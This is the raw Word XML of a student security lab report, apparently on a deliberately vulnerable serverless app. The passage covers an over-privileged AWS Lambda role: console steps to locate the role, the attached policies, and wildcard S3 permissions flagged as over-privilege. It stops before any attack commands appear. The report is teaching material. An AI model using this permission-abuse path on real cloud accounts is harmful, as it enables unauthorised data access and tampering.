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93B4" w14:textId="1B9D8197" w:rsidR="001D3ABE" w:rsidRPr="00F250E5" w:rsidRDefault="001D3ABE" w:rsidP="00F250E5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F250E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>ICS344</w:t>
      </w:r>
      <w:r w:rsidRPr="00F250E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br/>
        <w:t>Project</w:t>
      </w:r>
      <w:r w:rsidRPr="00F250E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br/>
        <w:t>Hassan Alhassan</w:t>
      </w:r>
      <w:r w:rsidRPr="00F250E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:br/>
        <w:t>Lesson-7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF25FB0" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="50094E83" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="2E4CEEF0" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="721512E9" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="276897AE" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="104B1449" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="1CD10F5C" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="0C2613F4" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="1FA1A812" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="4419AEF2" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="07B5105B" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="06872669" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="6EDB85E5" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="57495529" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="5E734ECA" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="5D3E08F2" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="40028DC0" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="7EB3A1FD" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="429D1C02" w14:textId="77777777" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="5CD4D0DA" w14:textId="6D86C5BB" w:rsidR="004F02D4" w:rsidRDefault="004F02D4"/>
    <w:p w14:paraId="3220FEA5" w14:textId="1ED77627" w:rsidR="00496DB7" w:rsidRPr="00496DB7" w:rsidRDefault="00496DB7" w:rsidP="00496DB7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905C5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lesson #</w:t>
      </w:r>
      <w:r w:rsidR="006F4F4F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00905C5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Over Privileged Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00905C5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D7654" w14:textId="515B2ED8" w:rsidR="004F02D4" w:rsidRPr="00D408CD" w:rsidRDefault="004F02D4" w:rsidP="004F02D4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 1) Goal and Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2390511E" w14:textId="4E82A228" w:rsidR="004F02D4" w:rsidRDefault="00D408CD" w:rsidP="008325FD">
      <w:r w:rsidRPr="00D408CD">
        <w:t>This lesson</w:t>
      </w:r>
      <w:r w:rsidR="008325FD">
        <w:t xml:space="preserve"> (7- </w:t>
      </w:r>
      <w:r w:rsidR="008325FD" w:rsidRPr="008325FD">
        <w:t>Over-Privileged Function</w:t>
      </w:r>
      <w:r w:rsidR="008325FD">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D408CD">
        <w:t xml:space="preserve"> demonstrates that a Lambda execution role can grant far more AWS permissions than a function actually needs. In serverless systems, this dramatically increases blast radius whenever code execution or abuse becomes possible.</w:t>
      </w:r>
      <w:r w:rsidR="00762146">
        <w:t xml:space="preserve"> For example, S3 could be abused where attacker could add, delete and etc</w:t>
      </w:r>
      <w:r w:rsidR="00560540">
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAFE4BB" w14:textId="77777777" w:rsidR="00760521" w:rsidRDefault="00760521" w:rsidP="00D408CD"/>
    <w:p w14:paraId="6A32B0B2" w14:textId="77777777" w:rsidR="00D408CD" w:rsidRDefault="00D408CD" w:rsidP="00D408CD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24B84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 2) Why This Works / Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6777F973" w14:textId="7D72049E" w:rsidR="001D3ABE" w:rsidRDefault="00D408CD" w:rsidP="00BE089E">
      <w:r w:rsidRPr="00D408CD">
        <w:t>The weakness in this lesson is not the business logic of the function itself, but the excessive IAM permissions attached to its execution role. In AWS serverless systems, any code running inside a Lambda function</w:t>
      </w:r>
      <w:r w:rsidR="00D257CB">
        <w:t xml:space="preserve"> automatically</w:t>
      </w:r>
      <w:r w:rsidRPr="00D408CD">
        <w:t xml:space="preserve"> inherits the role’s temporary credentials. As a result, if the function is abused or compromised, the attacker can perform any AWS action allowed by that role, even if those actions are unrelated to the function’s intended purpose. The root cause is therefore over-privileged role design and failure to enforce least privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CD108C" w14:textId="77777777" w:rsidR="00760521" w:rsidRDefault="00760521" w:rsidP="00BE089E"/>
    <w:p w14:paraId="174A73BB" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 3) Environment and Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AF081C" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00BE089E" w:rsidRDefault="00760521" w:rsidP="00BE089E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E469DEF" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Locate the Lambda Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16259ADD" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">Open the AWS Management Console. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB2DD3D" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve"> service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DE358A" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">From the left-hand menu, click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Functions”</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B8DACF" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:t>In the search bar, enter:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DVSA-SEND-RECEIPT-EMAIL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39879F5C" w14:textId="4892E42B" w:rsidR="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">Select the corresponding Lambda function from the results. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB7E4A0" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00BE089E" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F957B8" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Access the Function Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A6E717" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">Open the selected Lambda function page. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC2E80" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">Go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve"> tab. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6001D1D0" w14:textId="33CCA609" w:rsidR="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the left-side panel, click on </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56055E25" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00BE089E" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40DB080E" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: View the Execution Role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD0E5B7" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRPr="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">Under the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execution role</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve"> section, locate the role name. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42097526" w14:textId="77777777" w:rsidR="00BE089E" w:rsidRDefault="00BE089E" w:rsidP="00BE089E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve">Click on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>execution role name</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE089E">
        <w:t xml:space="preserve"> to open it in the IAM console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199A8EFD" w14:textId="009115A1" w:rsidR="005D2FC9" w:rsidRDefault="005D2FC9" w:rsidP="005D2FC9">
      <w:r w:rsidRPr="005D2FC9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F78047" wp14:editId="58280791">
            <wp:extent cx="5943600" cy="3336290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32739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99791" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3336290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF9F068" w14:textId="77777777" w:rsidR="00040E5A" w:rsidRDefault="00040E5A" w:rsidP="00040E5A"/>
    <w:p w14:paraId="415F453E" w14:textId="7A25021D" w:rsidR="00040E5A" w:rsidRDefault="005D2FC9" w:rsidP="00040E5A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Other Used Services You May Open: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E418AE9" w14:textId="1C828082" w:rsidR="00040E5A" w:rsidRPr="00040E5A" w:rsidRDefault="00040E5A" w:rsidP="00040E5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00040E5A">
        <w:t>Cloud Shell</w:t>
      </w:r>
      <w:r w:rsidR="00C54D07">
        <w:t>: Used for performing the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A95151C" w14:textId="2B823D05" w:rsidR="00040E5A" w:rsidRPr="00040E5A" w:rsidRDefault="00040E5A" w:rsidP="00040E5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00040E5A">
        <w:t>CloudTrail</w:t>
      </w:r>
      <w:r w:rsidR="00C54D07">
        <w:t>: Used for generating the policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13110916" w14:textId="1174BE34" w:rsidR="00040E5A" w:rsidRPr="00040E5A" w:rsidRDefault="00040E5A" w:rsidP="00040E5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00040E5A">
        <w:t>CloudWatch</w:t>
      </w:r>
      <w:r w:rsidR="00C54D07">
        <w:t>: Used for seeing the output of triggering the function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0639FE6A" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="69E66286" w14:textId="77777777" w:rsidR="001D3ABE" w:rsidRDefault="001D3ABE"/>
    <w:p w14:paraId="52606CCA" w14:textId="583A517B" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Part 4) Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC5467D" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1: Open IAM Role Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2E0BF1" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">Navigate to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IAM Role page</w:t>
      </w:r>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve"> accessed from the Lambda execution role. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8CF0FE" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve"> tab. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45380D43" w14:textId="6228F79A" w:rsidR="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">Review all attached policies associated with the role. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662755F9" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12619D08" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2: Identify Attached Policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D1FFA4" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:r w:rsidRPr="00760521">
        <w:t>Check for the following typical policies attached to the role:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24491836" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWSLambdaBasicExecutionRole</w:t>
      </w:r>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23329D18" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AmazonSESFullAccess</w:t>
      </w:r>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C17483" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SendReceiptFunctionRolePolicy1</w:t>
      </w:r>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve"> (S3 access) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039FBAC8" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SendReceiptFunctionRolePolicy2</w:t>
      </w:r>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve"> (DynamoDB access) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CD416E" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SendReceiptFunctionRolePolicy3</w:t>
      </w:r>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve"> (STS GetCallerIdentity) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A53EA55" w14:textId="1AE715DB" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521"/>
    <w:p w14:paraId="6051A2C2" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3: Analyze for Over-Privilege Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DDCB30" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:r w:rsidRPr="00760521">
        <w:t>While reviewing the policies, identify potential over-privilege patterns such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C8BAB0" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>S3 Over-Permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AEF25E" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">Wildcard resource access applied to all buckets or objects: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4294C083" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">arn:aws:s3:::* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAA3C8D" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00760521">
        <w:t xml:space="preserve">arn:aws:s3:::*/* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1DAB2" w14:textId="2E3E3B3E" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521"/>
    <w:p w14:paraId="138FA09B" w14:textId="77777777" w:rsidR="00760521" w:rsidRPr="00760521" w:rsidRDefault="00760521" w:rsidP="00760521">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
